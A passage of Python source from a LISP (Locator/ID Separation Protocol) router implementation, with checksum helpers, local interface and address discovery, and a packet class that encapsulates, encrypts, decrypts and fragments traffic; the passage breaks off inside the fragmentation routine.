def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum a ICMP Destination Unreachable Too Big message. It will staticly
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Comppute IGMP checksum. This is specialzed for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (netifaces.AF_INET not in addresses): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
p = lisp_format_packet(packet[0:12])
macs = p.replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = (sa in lisp_mymacs)
except: my_sa = False
if (da in lisp_mymacs): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (netifaces.AF_LINK not in parms): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (mac not in lisp_mymacs): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (netifaces.AF_INET in addresses):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (netifaces.AF_INET6 in addresses):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (netifaces.AF_INET in entry):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (netifaces.AF_INET6 in entry):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet(object):
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# Swap UDP port numbers and length field since they are 16-bit values.
#
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
udp_len = socket.htons(self.udp_length)
udp = struct.pack("HHHH", sport, dport, udp_len, self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = b""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = (old_div(length, 16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
encode_ciphertext = False
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
encode_ciphertext = True
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Chacha produced ciphertext in unicode for py2. Convert to raw-
# unicode-escape before proceeding, or else you can append to strings
# generated from different sources. Do this in do_icv() too.
#
if (encode_ciphertext):
ciphertext = ciphertext.encode("raw_unicode_escape")
#endif
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically repliciated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error as e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = old_div(frag_field, 8)
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
